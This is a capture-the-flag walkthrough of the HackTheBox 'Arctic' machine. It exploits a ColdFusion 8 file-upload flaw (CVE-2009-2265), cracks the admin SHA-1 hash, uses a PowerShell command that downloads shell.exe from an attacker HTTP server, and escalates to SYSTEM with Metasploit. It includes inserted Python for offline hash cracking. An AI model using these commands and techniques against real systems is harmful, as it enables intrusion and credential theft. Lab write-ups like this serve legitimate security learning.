
Hackthebox Arctic Walkthrough


Arctic is an easy Windows machine that involves straightforward exploitation with some minor challenges. The process begins by troubleshooting the web server to identify the correct exploit. Initial access is gained through an unauthenticated file upload in Adobe ColdFusion 8. Once a shell is obtained, privilege escalation is achieved using the MS10-059 exploit.

  • Let’s spawn the machine and get started.

# Enumeration


  • Let’s start with an nmap scan of all TCP ports (the box responds slowly, hence the raised --min-rate):
┌──(kali㉿kali)-[~/Desktop/HTB/Arctic]
└─$ nmap -sC -sV -p- 10.10.10.11 --min-rate=2000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 22:51 EDT
Nmap scan report for 10.10.10.11
Host is up (0.27s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.06 seconds
  • Only three ports are open: MSRPC on 135 and 49154, and 8500, which nmap could not identify (fmtp?). Browsing to port 8500 in a browser shows a directory listing.

  • After browsing through the directories, I found the Adobe ColdFusion 8 administrator login page, which tells us what is installed on the endpoint:
http://10.10.10.11:8500/CFIDE/administrator

  • Searching for a CVE and a PoC matching this version turned up CVE-2009-2265, an unauthenticated file upload in ColdFusion 8:
https://github.com/0xDTC/Adobe-ColdFusion-8-RCE-CVE-2009-2265

# Initial Access


  • Clone the repo:
git clone https://github.com/0xDTC/Adobe-ColdFusion-8-RCE-CVE-2009-2265
  • Then change into the PoC directory and run the exploit with the following options:
    • -l <LHOST> Local attacker IP (e.g., 10.10.16.5)
    • -p <LPORT> Local attacker port for the listener (e.g., 9001)
    • -r <RHOST> Remote target IP (e.g., 10.10.10.11)
    • -q <RPORT> Remote target port for ColdFusion (e.g., 8500)

  • The exploit returned a reverse shell.

  • The user flag is on the Desktop of the user tolis.

  • For privilege escalation, I looked around the ColdFusion install and found a password hash in the password.properties file. Locate it with:
dir C:\ColdFusion8\ /s /b | findstr password.properties

  • Looking the hash up on CrackStation gave the plaintext happyday.
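The same lookup can be done offline, which matters when the hash is not already in a public table. ColdFusion 8 stores the Administrator password in lib/password.properties as an unsalted, upper-case SHA-1 hex digest, which is why CrackStation resolves it instantly. The following is an added example, not code from the original post or from the PoC repo: it parses a constructed sample of the file (hash generated from the recovered password happyday; the rdspassword value is left empty), checks that the value has the 40-hex-character SHA-1 shape, and tries a small constructed wordlist against it.

```python
# Added example (not from the original post): offline recovery of the
# ColdFusion 8 Administrator hash found in lib/password.properties.
# CF8 stores that password as an unsalted, upper-case SHA-1 hex digest.
import hashlib
import re

# Constructed sample in the same key=value layout as CF8's password.properties.
# The digest is generated here from the password recovered on the box.
SAMPLE_PASSWORD_PROPERTIES = (
    "#Wed Mar 22 20:53:51 EET 2017\n"
    "rdspassword=\n"
    f"password={hashlib.sha1(b'happyday').hexdigest().upper()}\n"
    "encrypted=true\n"
)

# Constructed mini wordlist standing in for rockyou.txt or a lookup table.
WORDLIST = ["password", "coldfusion", "admin123", "happyday", "letmein"]


def parse_properties(text):
    """Return key/value pairs from a Java .properties file, skipping comments."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def is_cf8_sha1(value):
    """CF8 Administrator hashes are exactly 40 hex characters (SHA-1, no salt)."""
    return re.fullmatch(r"[0-9A-Fa-f]{40}", value) is not None


def crack_sha1(digest_hex, candidates):
    """Return the candidate whose SHA-1 equals digest_hex, or None."""
    target = digest_hex.lower()
    for word in candidates:
        if hashlib.sha1(word.encode()).hexdigest() == target:
            return word
    return None


def recover_admin_password(properties_text, candidates):
    """Parse password.properties and try to crack its 'password' entry."""
    props = parse_properties(properties_text)
    digest = props.get("password", "")
    if not is_cf8_sha1(digest):
        return None          # not a CF8-style hash, nothing to crack here
    return crack_sha1(digest, candidates)


if __name__ == "__main__":
    print(recover_admin_password(SAMPLE_PASSWORD_PROPERTIES, WORDLIST))
```

Against a real file, read the properties text from the copied password.properties and pass a full wordlist (for example the lines of rockyou.txt) as the candidate list; SHA-1 is fast enough that a multi-million-word list finishes in seconds.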

  • For an easy win I turned to Metasploit for privilege escalation. First, generate a shell.exe that will call back to a Meterpreter listener.

  • Then start a Python HTTP server to host the file.

  • Now set up the Meterpreter handler. The payload set here must match the one shell.exe was generated with (windows/meterpreter/reverse_tcp is the x86 stager, windows/x64/meterpreter/reverse_tcp the x64 one):
msf6 auxiliary(scanner/http/coldfusion_locale_traversal) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
  • Then run the following on the initial reverse shell to download shell.exe from the attacker's web server into the shell's current working directory:
powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.11:8000/shell.exe', 'shell.exe')"

  • After downloading and running shell.exe, we get the Meterpreter session.
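The handler transcript above switches the payload from windows/x64/meterpreter/reverse_tcp to the x86 windows/meterpreter/reverse_tcp. A staged Meterpreter only connects back cleanly when shell.exe and the handler payload are the same architecture, so it is worth checking the binary before starting the handler. The following is an added example, not code from the original post: it reads the Machine field of the PE's COFF header (0x014C for x86, 0x8664 for x64) and compares it with the handler payload name. The make_fake_pe helper builds constructed stub headers only for the self-test; in practice point pe_architecture at the real shell.exe.

```python
# Added example (not from the original post): confirm that shell.exe and the
# Metasploit handler payload agree on architecture before starting the handler.
import struct
import sys

IMAGE_FILE_MACHINE_I386 = 0x014C   # x86
IMAGE_FILE_MACHINE_AMD64 = 0x8664  # x64


def pe_architecture(data):
    """Return 'x86', 'x64' or 'unknown' from a PE image's COFF header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "unknown"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)   # offset of "PE\0\0"
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "unknown"
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)  # COFF Machine field
    return {IMAGE_FILE_MACHINE_I386: "x86",
            IMAGE_FILE_MACHINE_AMD64: "x64"}.get(machine, "unknown")


def handler_architecture(msf_payload):
    """Architecture implied by a Metasploit Windows payload name."""
    return "x64" if msf_payload.startswith("windows/x64/") else "x86"


def payload_matches_handler(exe_bytes, msf_payload):
    """True when the PE's architecture matches the handler payload's."""
    return pe_architecture(exe_bytes) == handler_architecture(msf_payload)


def make_fake_pe(machine):
    """Constructed stub for testing: DOS header pointing at a minimal COFF header."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)        # e_lfanew -> right after DOS header
    coff = b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18
    return bytes(dos) + coff


if __name__ == "__main__":
    # usage: python check_arch.py shell.exe windows/meterpreter/reverse_tcp
    with open(sys.argv[1], "rb") as f:
        exe = f.read()
    print(f"{sys.argv[1]}: {pe_architecture(exe)}, handler expects "
          f"{handler_architecture(sys.argv[2])}, "
          f"match={payload_matches_handler(exe, sys.argv[2])}")
```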

# Privilege Escalation


  • Next, migrate the session into a process running as x64. First, list the running processes.

  • Then migrate into one of them: migrate <PID>

  • After that, run the local exploit suggester module (post/multi/recon/local_exploit_suggester) to look for privilege escalation vulnerabilities.

  • Pick one of the exploit modules the suggester reports the machine as vulnerable to, set its options (session, LHOST, LPORT), and run it.

  • This returns a second Meterpreter session running as NT AUTHORITY\SYSTEM.

  • Now we can read the root flag.


# Final Thoughts


I hope this blog continues to be helpful in your learning journey! If you find it helpful, I’d love to hear your thoughts; my inbox is always open for feedback. Please excuse any typos, and feel free to point them out so I can correct them. Thanks for understanding and happy learning! You can contact me on LinkedIn and Twitter.

This post is licensed under CC BY 4.0 by the author.